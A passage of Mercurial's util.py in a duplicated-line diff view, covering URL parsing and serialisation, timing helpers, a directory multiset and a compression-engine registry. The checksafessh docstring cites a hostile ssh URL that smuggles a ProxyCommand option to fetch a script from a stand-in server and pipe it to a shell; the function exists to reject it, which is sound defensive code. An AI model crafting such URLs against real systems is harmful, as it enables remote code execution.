2776 not (self.host.startswith('[') and self.host.endswith(']'))):
2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2777 self._hostport = self.host
2787 self._hostport = self.host
2778 self.host, self.port = self.host.rsplit(':', 1)
2788 self.host, self.port = self.host.rsplit(':', 1)
2779 if not self.host:
2789 if not self.host:
2780 self.host = None
2790 self.host = None
2781
2791
2782 if (self.host and self.scheme == 'file' and
2792 if (self.host and self.scheme == 'file' and
2783 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2784 raise error.Abort(_('file:// URLs can only refer to localhost'))
2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2785
2795
2786 self.path = path
2796 self.path = path
2787
2797
2788 # leave the query string escaped
2798 # leave the query string escaped
2789 for a in ('user', 'passwd', 'host', 'port',
2799 for a in ('user', 'passwd', 'host', 'port',
2790 'path', 'fragment'):
2800 'path', 'fragment'):
2791 v = getattr(self, a)
2801 v = getattr(self, a)
2792 if v is not None:
2802 if v is not None:
2793 setattr(self, a, urlreq.unquote(v))
2803 setattr(self, a, urlreq.unquote(v))
2794
2804
2795 @encoding.strmethod
2805 @encoding.strmethod
2796 def __repr__(self):
2806 def __repr__(self):
2797 attrs = []
2807 attrs = []
2798 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2799 'query', 'fragment'):
2809 'query', 'fragment'):
2800 v = getattr(self, a)
2810 v = getattr(self, a)
2801 if v is not None:
2811 if v is not None:
2802 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2803 return '<url %s>' % ', '.join(attrs)
2813 return '<url %s>' % ', '.join(attrs)
2804
2814
2805 def __bytes__(self):
2815 def __bytes__(self):
2806 r"""Join the URL's components back into a URL string.
2816 r"""Join the URL's components back into a URL string.
2807
2817
2808 Examples:
2818 Examples:
2809
2819
2810 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2811 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2812 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2813 'http://user:pw@host:80/?foo=bar&baz=42'
2823 'http://user:pw@host:80/?foo=bar&baz=42'
2814 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2815 'http://user:pw@host:80/?foo=bar%3dbaz'
2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2816 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2817 'ssh://user:pw@[::1]:2200//home/joe#'
2827 'ssh://user:pw@[::1]:2200//home/joe#'
2818 >>> bytes(url(b'http://localhost:80//'))
2828 >>> bytes(url(b'http://localhost:80//'))
2819 'http://localhost:80//'
2829 'http://localhost:80//'
2820 >>> bytes(url(b'http://localhost:80/'))
2830 >>> bytes(url(b'http://localhost:80/'))
2821 'http://localhost:80/'
2831 'http://localhost:80/'
2822 >>> bytes(url(b'http://localhost:80'))
2832 >>> bytes(url(b'http://localhost:80'))
2823 'http://localhost:80/'
2833 'http://localhost:80/'
2824 >>> bytes(url(b'bundle:foo'))
2834 >>> bytes(url(b'bundle:foo'))
2825 'bundle:foo'
2835 'bundle:foo'
2826 >>> bytes(url(b'bundle://../foo'))
2836 >>> bytes(url(b'bundle://../foo'))
2827 'bundle:../foo'
2837 'bundle:../foo'
2828 >>> bytes(url(b'path'))
2838 >>> bytes(url(b'path'))
2829 'path'
2839 'path'
2830 >>> bytes(url(b'file:///tmp/foo/bar'))
2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2831 'file:///tmp/foo/bar'
2841 'file:///tmp/foo/bar'
2832 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2833 'file:///c:/tmp/foo/bar'
2843 'file:///c:/tmp/foo/bar'
2834 >>> print(url(br'bundle:foo\bar'))
2844 >>> print(url(br'bundle:foo\bar'))
2835 bundle:foo\bar
2845 bundle:foo\bar
2836 >>> print(url(br'file:///D:\data\hg'))
2846 >>> print(url(br'file:///D:\data\hg'))
2837 file:///D:\data\hg
2847 file:///D:\data\hg
2838 """
2848 """
2839 if self._localpath:
2849 if self._localpath:
2840 s = self.path
2850 s = self.path
2841 if self.scheme == 'bundle':
2851 if self.scheme == 'bundle':
2842 s = 'bundle:' + s
2852 s = 'bundle:' + s
2843 if self.fragment:
2853 if self.fragment:
2844 s += '#' + self.fragment
2854 s += '#' + self.fragment
2845 return s
2855 return s
2846
2856
2847 s = self.scheme + ':'
2857 s = self.scheme + ':'
2848 if self.user or self.passwd or self.host:
2858 if self.user or self.passwd or self.host:
2849 s += '//'
2859 s += '//'
2850 elif self.scheme and (not self.path or self.path.startswith('/')
2860 elif self.scheme and (not self.path or self.path.startswith('/')
2851 or hasdriveletter(self.path)):
2861 or hasdriveletter(self.path)):
2852 s += '//'
2862 s += '//'
2853 if hasdriveletter(self.path):
2863 if hasdriveletter(self.path):
2854 s += '/'
2864 s += '/'
2855 if self.user:
2865 if self.user:
2856 s += urlreq.quote(self.user, safe=self._safechars)
2866 s += urlreq.quote(self.user, safe=self._safechars)
2857 if self.passwd:
2867 if self.passwd:
2858 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2859 if self.user or self.passwd:
2869 if self.user or self.passwd:
2860 s += '@'
2870 s += '@'
2861 if self.host:
2871 if self.host:
2862 if not (self.host.startswith('[') and self.host.endswith(']')):
2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2863 s += urlreq.quote(self.host)
2873 s += urlreq.quote(self.host)
2864 else:
2874 else:
2865 s += self.host
2875 s += self.host
2866 if self.port:
2876 if self.port:
2867 s += ':' + urlreq.quote(self.port)
2877 s += ':' + urlreq.quote(self.port)
2868 if self.host:
2878 if self.host:
2869 s += '/'
2879 s += '/'
2870 if self.path:
2880 if self.path:
2871 # TODO: similar to the query string, we should not unescape the
2881 # TODO: similar to the query string, we should not unescape the
2872 # path when we store it, the path might contain '%2f' = '/',
2882 # path when we store it, the path might contain '%2f' = '/',
2873 # which we should *not* escape.
2883 # which we should *not* escape.
2874 s += urlreq.quote(self.path, safe=self._safepchars)
2884 s += urlreq.quote(self.path, safe=self._safepchars)
2875 if self.query:
2885 if self.query:
2876 # we store the query in escaped form.
2886 # we store the query in escaped form.
2877 s += '?' + self.query
2887 s += '?' + self.query
2878 if self.fragment is not None:
2888 if self.fragment is not None:
2879 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2880 return s
2890 return s
2881
2891
2882 __str__ = encoding.strmethod(__bytes__)
2892 __str__ = encoding.strmethod(__bytes__)
2883
2893
2884 def authinfo(self):
2894 def authinfo(self):
2885 user, passwd = self.user, self.passwd
2895 user, passwd = self.user, self.passwd
2886 try:
2896 try:
2887 self.user, self.passwd = None, None
2897 self.user, self.passwd = None, None
2888 s = bytes(self)
2898 s = bytes(self)
2889 finally:
2899 finally:
2890 self.user, self.passwd = user, passwd
2900 self.user, self.passwd = user, passwd
2891 if not self.user:
2901 if not self.user:
2892 return (s, None)
2902 return (s, None)
2893 # authinfo[1] is passed to urllib2 password manager, and its
2903 # authinfo[1] is passed to urllib2 password manager, and its
2894 # URIs must not contain credentials. The host is passed in the
2904 # URIs must not contain credentials. The host is passed in the
2895 # URIs list because Python < 2.4.3 uses only that to search for
2905 # URIs list because Python < 2.4.3 uses only that to search for
2896 # a password.
2906 # a password.
2897 return (s, (None, (s, self.host),
2907 return (s, (None, (s, self.host),
2898 self.user, self.passwd or ''))
2908 self.user, self.passwd or ''))
2899
2909
2900 def isabs(self):
2910 def isabs(self):
2901 if self.scheme and self.scheme != 'file':
2911 if self.scheme and self.scheme != 'file':
2902 return True # remote URL
2912 return True # remote URL
2903 if hasdriveletter(self.path):
2913 if hasdriveletter(self.path):
2904 return True # absolute for our purposes - can't be joined()
2914 return True # absolute for our purposes - can't be joined()
2905 if self.path.startswith(br'\\'):
2915 if self.path.startswith(br'\\'):
2906 return True # Windows UNC path
2916 return True # Windows UNC path
2907 if self.path.startswith('/'):
2917 if self.path.startswith('/'):
2908 return True # POSIX-style
2918 return True # POSIX-style
2909 return False
2919 return False
2910
2920
2911 def localpath(self):
2921 def localpath(self):
2912 if self.scheme == 'file' or self.scheme == 'bundle':
2922 if self.scheme == 'file' or self.scheme == 'bundle':
2913 path = self.path or '/'
2923 path = self.path or '/'
2914 # For Windows, we need to promote hosts containing drive
2924 # For Windows, we need to promote hosts containing drive
2915 # letters to paths with drive letters.
2925 # letters to paths with drive letters.
2916 if hasdriveletter(self._hostport):
2926 if hasdriveletter(self._hostport):
2917 path = self._hostport + '/' + self.path
2927 path = self._hostport + '/' + self.path
2918 elif (self.host is not None and self.path
2928 elif (self.host is not None and self.path
2919 and not hasdriveletter(path)):
2929 and not hasdriveletter(path)):
2920 path = '/' + path
2930 path = '/' + path
2921 return path
2931 return path
2922 return self._origpath
2932 return self._origpath
2923
2933
2924 def islocal(self):
2934 def islocal(self):
2925 '''whether localpath will return something that posixfile can open'''
2935 '''whether localpath will return something that posixfile can open'''
2926 return (not self.scheme or self.scheme == 'file'
2936 return (not self.scheme or self.scheme == 'file'
2927 or self.scheme == 'bundle')
2937 or self.scheme == 'bundle')
2928
2938
2929 def hasscheme(path):
2939 def hasscheme(path):
2930 return bool(url(path).scheme)
2940 return bool(url(path).scheme)
2931
2941
2932 def hasdriveletter(path):
2942 def hasdriveletter(path):
2933 return path and path[1:2] == ':' and path[0:1].isalpha()
2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2934
2944
2935 def urllocalpath(path):
2945 def urllocalpath(path):
2936 return url(path, parsequery=False, parsefragment=False).localpath()
2946 return url(path, parsequery=False, parsefragment=False).localpath()
2937
2947
2938 def checksafessh(path):
2948 def checksafessh(path):
2939 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2940
2950
2941 This is a sanity check for ssh urls. ssh will parse the first item as
2951 This is a sanity check for ssh urls. ssh will parse the first item as
2942 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2943 Let's prevent these potentially exploited urls entirely and warn the
2953 Let's prevent these potentially exploited urls entirely and warn the
2944 user.
2954 user.
2945
2955
2946 Raises an error.Abort when the url is unsafe.
2956 Raises an error.Abort when the url is unsafe.
2947 """
2957 """
2948 path = urlreq.unquote(path)
2958 path = urlreq.unquote(path)
2949 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2950 raise error.Abort(_('potentially unsafe url: %r') %
2960 raise error.Abort(_('potentially unsafe url: %r') %
2951 (pycompat.bytestr(path),))
2961 (pycompat.bytestr(path),))
2952
2962
2953 def hidepassword(u):
2963 def hidepassword(u):
2954 '''hide user credential in a url string'''
2964 '''hide user credential in a url string'''
2955 u = url(u)
2965 u = url(u)
2956 if u.passwd:
2966 if u.passwd:
2957 u.passwd = '***'
2967 u.passwd = '***'
2958 return bytes(u)
2968 return bytes(u)
2959
2969
2960 def removeauth(u):
2970 def removeauth(u):
2961 '''remove all authentication information from a url string'''
2971 '''remove all authentication information from a url string'''
2962 u = url(u)
2972 u = url(u)
2963 u.user = u.passwd = None
2973 u.user = u.passwd = None
2964 return bytes(u)
2974 return bytes(u)
2965
2975
2966 timecount = unitcountfn(
2976 timecount = unitcountfn(
2967 (1, 1e3, _('%.0f s')),
2977 (1, 1e3, _('%.0f s')),
2968 (100, 1, _('%.1f s')),
2978 (100, 1, _('%.1f s')),
2969 (10, 1, _('%.2f s')),
2979 (10, 1, _('%.2f s')),
2970 (1, 1, _('%.3f s')),
2980 (1, 1, _('%.3f s')),
2971 (100, 0.001, _('%.1f ms')),
2981 (100, 0.001, _('%.1f ms')),
2972 (10, 0.001, _('%.2f ms')),
2982 (10, 0.001, _('%.2f ms')),
2973 (1, 0.001, _('%.3f ms')),
2983 (1, 0.001, _('%.3f ms')),
2974 (100, 0.000001, _('%.1f us')),
2984 (100, 0.000001, _('%.1f us')),
2975 (10, 0.000001, _('%.2f us')),
2985 (10, 0.000001, _('%.2f us')),
2976 (1, 0.000001, _('%.3f us')),
2986 (1, 0.000001, _('%.3f us')),
2977 (100, 0.000000001, _('%.1f ns')),
2987 (100, 0.000000001, _('%.1f ns')),
2978 (10, 0.000000001, _('%.2f ns')),
2988 (10, 0.000000001, _('%.2f ns')),
2979 (1, 0.000000001, _('%.3f ns')),
2989 (1, 0.000000001, _('%.3f ns')),
2980 )
2990 )
2981
2991
2982 @attr.s
2992 @attr.s
2983 class timedcmstats(object):
2993 class timedcmstats(object):
2984 """Stats information produced by the timedcm context manager on entering."""
2994 """Stats information produced by the timedcm context manager on entering."""
2985
2995
2986 # the starting value of the timer as a float (meaning and resulution is
2996 # the starting value of the timer as a float (meaning and resulution is
2987 # platform dependent, see util.timer)
2997 # platform dependent, see util.timer)
2988 start = attr.ib(default=attr.Factory(lambda: timer()))
2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2989 # the number of seconds as a floating point value; starts at 0, updated when
2999 # the number of seconds as a floating point value; starts at 0, updated when
2990 # the context is exited.
3000 # the context is exited.
2991 elapsed = attr.ib(default=0)
3001 elapsed = attr.ib(default=0)
2992 # the number of nested timedcm context managers.
3002 # the number of nested timedcm context managers.
2993 level = attr.ib(default=1)
3003 level = attr.ib(default=1)
2994
3004
2995 def __bytes__(self):
3005 def __bytes__(self):
2996 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2997
3007
2998 __str__ = encoding.strmethod(__bytes__)
3008 __str__ = encoding.strmethod(__bytes__)
2999
3009
3000 @contextlib.contextmanager
3010 @contextlib.contextmanager
3001 def timedcm(whencefmt, *whenceargs):
3011 def timedcm(whencefmt, *whenceargs):
3002 """A context manager that produces timing information for a given context.
3012 """A context manager that produces timing information for a given context.
3003
3013
3004 On entering a timedcmstats instance is produced.
3014 On entering a timedcmstats instance is produced.
3005
3015
3006 This context manager is reentrant.
3016 This context manager is reentrant.
3007
3017
3008 """
3018 """
3009 # track nested context managers
3019 # track nested context managers
3010 timedcm._nested += 1
3020 timedcm._nested += 1
3011 timing_stats = timedcmstats(level=timedcm._nested)
3021 timing_stats = timedcmstats(level=timedcm._nested)
3012 try:
3022 try:
3013 with tracing.log(whencefmt, *whenceargs):
3023 with tracing.log(whencefmt, *whenceargs):
3014 yield timing_stats
3024 yield timing_stats
3015 finally:
3025 finally:
3016 timing_stats.elapsed = timer() - timing_stats.start
3026 timing_stats.elapsed = timer() - timing_stats.start
3017 timedcm._nested -= 1
3027 timedcm._nested -= 1
3018
3028
3019 timedcm._nested = 0
3029 timedcm._nested = 0
3020
3030
3021 def timed(func):
3031 def timed(func):
3022 '''Report the execution time of a function call to stderr.
3032 '''Report the execution time of a function call to stderr.
3023
3033
3024 During development, use as a decorator when you need to measure
3034 During development, use as a decorator when you need to measure
3025 the cost of a function, e.g. as follows:
3035 the cost of a function, e.g. as follows:
3026
3036
3027 @util.timed
3037 @util.timed
3028 def foo(a, b, c):
3038 def foo(a, b, c):
3029 pass
3039 pass
3030 '''
3040 '''
3031
3041
3032 def wrapper(*args, **kwargs):
3042 def wrapper(*args, **kwargs):
3033 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3034 result = func(*args, **kwargs)
3044 result = func(*args, **kwargs)
3035 stderr = procutil.stderr
3045 stderr = procutil.stderr
3036 stderr.write('%s%s: %s\n' % (
3046 stderr.write('%s%s: %s\n' % (
3037 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3038 time_stats))
3048 time_stats))
3039 return result
3049 return result
3040 return wrapper
3050 return wrapper
3041
3051
3042 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3043 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3044
3054
3045 def sizetoint(s):
3055 def sizetoint(s):
3046 '''Convert a space specifier to a byte count.
3056 '''Convert a space specifier to a byte count.
3047
3057
3048 >>> sizetoint(b'30')
3058 >>> sizetoint(b'30')
3049 30
3059 30
3050 >>> sizetoint(b'2.2kb')
3060 >>> sizetoint(b'2.2kb')
3051 2252
3061 2252
3052 >>> sizetoint(b'6M')
3062 >>> sizetoint(b'6M')
3053 6291456
3063 6291456
3054 '''
3064 '''
3055 t = s.strip().lower()
3065 t = s.strip().lower()
3056 try:
3066 try:
3057 for k, u in _sizeunits:
3067 for k, u in _sizeunits:
3058 if t.endswith(k):
3068 if t.endswith(k):
3059 return int(float(t[:-len(k)]) * u)
3069 return int(float(t[:-len(k)]) * u)
3060 return int(t)
3070 return int(t)
3061 except ValueError:
3071 except ValueError:
3062 raise error.ParseError(_("couldn't parse size: %s") % s)
3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3063
3073
3064 class hooks(object):
3074 class hooks(object):
3065 '''A collection of hook functions that can be used to extend a
3075 '''A collection of hook functions that can be used to extend a
3066 function's behavior. Hooks are called in lexicographic order,
3076 function's behavior. Hooks are called in lexicographic order,
3067 based on the names of their sources.'''
3077 based on the names of their sources.'''
3068
3078
3069 def __init__(self):
3079 def __init__(self):
3070 self._hooks = []
3080 self._hooks = []
3071
3081
3072 def add(self, source, hook):
3082 def add(self, source, hook):
3073 self._hooks.append((source, hook))
3083 self._hooks.append((source, hook))
3074
3084
3075 def __call__(self, *args):
3085 def __call__(self, *args):
3076 self._hooks.sort(key=lambda x: x[0])
3086 self._hooks.sort(key=lambda x: x[0])
3077 results = []
3087 results = []
3078 for source, hook in self._hooks:
3088 for source, hook in self._hooks:
3079 results.append(hook(*args))
3089 results.append(hook(*args))
3080 return results
3090 return results
3081
3091
3082 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3083 '''Yields lines for a nicely formatted stacktrace.
3093 '''Yields lines for a nicely formatted stacktrace.
3084 Skips the 'skip' last entries, then return the last 'depth' entries.
3094 Skips the 'skip' last entries, then return the last 'depth' entries.
3085 Each file+linenumber is formatted according to fileline.
3095 Each file+linenumber is formatted according to fileline.
3086 Each line is formatted according to line.
3096 Each line is formatted according to line.
3087 If line is None, it yields:
3097 If line is None, it yields:
3088 length of longest filepath+line number,
3098 length of longest filepath+line number,
3089 filepath+linenumber,
3099 filepath+linenumber,
3090 function
3100 function
3091
3101
3092 Not be used in production code but very convenient while developing.
3102 Not be used in production code but very convenient while developing.
3093 '''
3103 '''
3094 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3095 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3096 ][-depth:]
3106 ][-depth:]
3097 if entries:
3107 if entries:
3098 fnmax = max(len(entry[0]) for entry in entries)
3108 fnmax = max(len(entry[0]) for entry in entries)
3099 for fnln, func in entries:
3109 for fnln, func in entries:
3100 if line is None:
3110 if line is None:
3101 yield (fnmax, fnln, func)
3111 yield (fnmax, fnln, func)
3102 else:
3112 else:
3103 yield line % (fnmax, fnln, func)
3113 yield line % (fnmax, fnln, func)
3104
3114
3105 def debugstacktrace(msg='stacktrace', skip=0,
3115 def debugstacktrace(msg='stacktrace', skip=0,
3106 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3107 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3108 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3118 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3109 By default it will flush stdout first.
3119 By default it will flush stdout first.
3110 It can be used everywhere and intentionally does not require an ui object.
3120 It can be used everywhere and intentionally does not require an ui object.
3111 Not be used in production code but very convenient while developing.
3121 Not be used in production code but very convenient while developing.
3112 '''
3122 '''
3113 if otherf:
3123 if otherf:
3114 otherf.flush()
3124 otherf.flush()
3115 f.write('%s at:\n' % msg.rstrip())
3125 f.write('%s at:\n' % msg.rstrip())
3116 for line in getstackframes(skip + 1, depth=depth):
3126 for line in getstackframes(skip + 1, depth=depth):
3117 f.write(line)
3127 f.write(line)
3118 f.flush()
3128 f.flush()
3119
3129
3120 class dirs(object):
3130 class dirs(object):
3121 '''a multiset of directory names from a dirstate or manifest'''
3131 '''a multiset of directory names from a dirstate or manifest'''
3122
3132
3123 def __init__(self, map, skip=None):
3133 def __init__(self, map, skip=None):
3124 self._dirs = {}
3134 self._dirs = {}
3125 addpath = self.addpath
3135 addpath = self.addpath
3126 if safehasattr(map, 'iteritems') and skip is not None:
3136 if safehasattr(map, 'iteritems') and skip is not None:
3127 for f, s in map.iteritems():
3137 for f, s in map.iteritems():
3128 if s[0] != skip:
3138 if s[0] != skip:
3129 addpath(f)
3139 addpath(f)
3130 else:
3140 else:
3131 for f in map:
3141 for f in map:
3132 addpath(f)
3142 addpath(f)
3133
3143
3134 def addpath(self, path):
3144 def addpath(self, path):
3135 dirs = self._dirs
3145 dirs = self._dirs
3136 for base in finddirs(path):
3146 for base in finddirs(path):
3137 if base in dirs:
3147 if base in dirs:
3138 dirs[base] += 1
3148 dirs[base] += 1
3139 return
3149 return
3140 dirs[base] = 1
3150 dirs[base] = 1
3141
3151
3142 def delpath(self, path):
3152 def delpath(self, path):
3143 dirs = self._dirs
3153 dirs = self._dirs
3144 for base in finddirs(path):
3154 for base in finddirs(path):
3145 if dirs[base] > 1:
3155 if dirs[base] > 1:
3146 dirs[base] -= 1
3156 dirs[base] -= 1
3147 return
3157 return
3148 del dirs[base]
3158 del dirs[base]
3149
3159
3150 def __iter__(self):
3160 def __iter__(self):
3151 return iter(self._dirs)
3161 return iter(self._dirs)
3152
3162
3153 def __contains__(self, d):
3163 def __contains__(self, d):
3154 return d in self._dirs
3164 return d in self._dirs
3155
3165
3156 if safehasattr(parsers, 'dirs'):
3166 if safehasattr(parsers, 'dirs'):
3157 dirs = parsers.dirs
3167 dirs = parsers.dirs
3158
3168
3159 def finddirs(path):
3169 def finddirs(path):
3160 pos = path.rfind('/')
3170 pos = path.rfind('/')
3161 while pos != -1:
3171 while pos != -1:
3162 yield path[:pos]
3172 yield path[:pos]
3163 pos = path.rfind('/', 0, pos)
3173 pos = path.rfind('/', 0, pos)
3164
3174
3165 # compression code
3175 # compression code
3166
3176
3167 SERVERROLE = 'server'
3177 SERVERROLE = 'server'
3168 CLIENTROLE = 'client'
3178 CLIENTROLE = 'client'
3169
3179
3170 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3171 (u'name', u'serverpriority',
3181 (u'name', u'serverpriority',
3172 u'clientpriority'))
3182 u'clientpriority'))
3173
3183
3174 class compressormanager(object):
3184 class compressormanager(object):
3175 """Holds registrations of various compression engines.
3185 """Holds registrations of various compression engines.
3176
3186
3177 This class essentially abstracts the differences between compression
3187 This class essentially abstracts the differences between compression
3178 engines to allow new compression formats to be added easily, possibly from
3188 engines to allow new compression formats to be added easily, possibly from
3179 extensions.
3189 extensions.
3180
3190
3181 Compressors are registered against the global instance by calling its
3191 Compressors are registered against the global instance by calling its
3182 ``register()`` method.
3192 ``register()`` method.
3183 """
3193 """
3184 def __init__(self):
3194 def __init__(self):
3185 self._engines = {}
3195 self._engines = {}
3186 # Bundle spec human name to engine name.
3196 # Bundle spec human name to engine name.
3187 self._bundlenames = {}
3197 self._bundlenames = {}
3188 # Internal bundle identifier to engine name.
3198 # Internal bundle identifier to engine name.
3189 self._bundletypes = {}
3199 self._bundletypes = {}
3190 # Revlog header to engine name.
3200 # Revlog header to engine name.
3191 self._revlogheaders = {}
3201 self._revlogheaders = {}
3192 # Wire proto identifier to engine name.
3202 # Wire proto identifier to engine name.
3193 self._wiretypes = {}
3203 self._wiretypes = {}
3194
3204
3195 def __getitem__(self, key):
3205 def __getitem__(self, key):
3196 return self._engines[key]
3206 return self._engines[key]
3197
3207
3198 def __contains__(self, key):
3208 def __contains__(self, key):
3199 return key in self._engines
3209 return key in self._engines
3200
3210
3201 def __iter__(self):
3211 def __iter__(self):
3202 return iter(self._engines.keys())
3212 return iter(self._engines.keys())
3203
3213
3204 def register(self, engine):
3214 def register(self, engine):
3205 """Register a compression engine with the manager.
3215 """Register a compression engine with the manager.
3206
3216
3207 The argument must be a ``compressionengine`` instance.
3217 The argument must be a ``compressionengine`` instance.
3208 """
3218 """
3209 if not isinstance(engine, compressionengine):
3219 if not isinstance(engine, compressionengine):
3210 raise ValueError(_('argument must be a compressionengine'))
3220 raise ValueError(_('argument must be a compressionengine'))
3211
3221
3212 name = engine.name()
3222 name = engine.name()
3213
3223
3214 if name in self._engines:
3224 if name in self._engines:
3215 raise error.Abort(_('compression engine %s already registered') %
3225 raise error.Abort(_('compression engine %s already registered') %
3216 name)
3226 name)
3217
3227
3218 bundleinfo = engine.bundletype()
3228 bundleinfo = engine.bundletype()
3219 if bundleinfo:
3229 if bundleinfo:
3220 bundlename, bundletype = bundleinfo
3230 bundlename, bundletype = bundleinfo
3221
3231
3222 if bundlename in self._bundlenames:
3232 if bundlename in self._bundlenames:
3223 raise error.Abort(_('bundle name %s already registered') %
3233 raise error.Abort(_('bundle name %s already registered') %
3224 bundlename)
3234 bundlename)
3225 if bundletype in self._bundletypes:
3235 if bundletype in self._bundletypes:
3226 raise error.Abort(_('bundle type %s already registered by %s') %
3236 raise error.Abort(_('bundle type %s already registered by %s') %
3227 (bundletype, self._bundletypes[bundletype]))
3237 (bundletype, self._bundletypes[bundletype]))
3228
3238
3229 # No external facing name declared.
3239 # No external facing name declared.
3230 if bundlename:
3240 if bundlename:
3231 self._bundlenames[bundlename] = name
3241 self._bundlenames[bundlename] = name
3232
3242
3233 self._bundletypes[bundletype] = name
3243 self._bundletypes[bundletype] = name
3234
3244
3235 wiresupport = engine.wireprotosupport()
3245 wiresupport = engine.wireprotosupport()
3236 if wiresupport:
3246 if wiresupport:
3237 wiretype = wiresupport.name
3247 wiretype = wiresupport.name
3238 if wiretype in self._wiretypes:
3248 if wiretype in self._wiretypes:
3239 raise error.Abort(_('wire protocol compression %s already '
3249 raise error.Abort(_('wire protocol compression %s already '
3240 'registered by %s') %
3250 'registered by %s') %
3241 (wiretype, self._wiretypes[wiretype]))
3251 (wiretype, self._wiretypes[wiretype]))
3242
3252
3243 self._wiretypes[wiretype] = name
3253 self._wiretypes[wiretype] = name
3244
3254
3245 revlogheader = engine.revlogheader()
3255 revlogheader = engine.revlogheader()
3246 if revlogheader and revlogheader in self._revlogheaders:
3256 if revlogheader and revlogheader in self._revlogheaders:
3247 raise error.Abort(_('revlog header %s already registered by %s') %
3257 raise error.Abort(_('revlog header %s already registered by %s') %
3248 (revlogheader, self._revlogheaders[revlogheader]))
3258 (revlogheader, self._revlogheaders[revlogheader]))
3249
3259
3250 if revlogheader:
3260 if revlogheader:
3251 self._revlogheaders[revlogheader] = name
3261 self._revlogheaders[revlogheader] = name
3252
3262
3253 self._engines[name] = engine
3263 self._engines[name] = engine
3254
3264
3255 @property
3265 @property
3256 def supportedbundlenames(self):
3266 def supportedbundlenames(self):
3257 return set(self._bundlenames.keys())
3267 return set(self._bundlenames.keys())
3258
3268
3259 @property
3269 @property
3260 def supportedbundletypes(self):
3270 def supportedbundletypes(self):
3261 return set(self._bundletypes.keys())
3271 return set(self._bundletypes.keys())
3262
3272
3263 def forbundlename(self, bundlename):
3273 def forbundlename(self, bundlename):
3264 """Obtain a compression engine registered to a bundle name.
3274 """Obtain a compression engine registered to a bundle name.
3265
3275
3266 Will raise KeyError if the bundle type isn't registered.
3276 Will raise KeyError if the bundle type isn't registered.
3267
3277
3268 Will abort if the engine is known but not available.
3278 Will abort if the engine is known but not available.
3269 """
3279 """
3270 engine = self._engines[self._bundlenames[bundlename]]
3280 engine = self._engines[self._bundlenames[bundlename]]
3271 if not engine.available():
3281 if not engine.available():
3272 raise error.Abort(_('compression engine %s could not be loaded') %
3282 raise error.Abort(_('compression engine %s could not be loaded') %
3273 engine.name())
3283 engine.name())
3274 return engine
3284 return engine
3275
3285
3276 def forbundletype(self, bundletype):
3286 def forbundletype(self, bundletype):
3277 """Obtain a compression engine registered to a bundle type.
3287 """Obtain a compression engine registered to a bundle type.
3278
3288
3279 Will raise KeyError if the bundle type isn't registered.
3289 Will raise KeyError if the bundle type isn't registered.
3280
3290
3281 Will abort if the engine is known but not available.
3291 Will abort if the engine is known but not available.
3282 """
3292 """
3283 engine = self._engines[self._bundletypes[bundletype]]
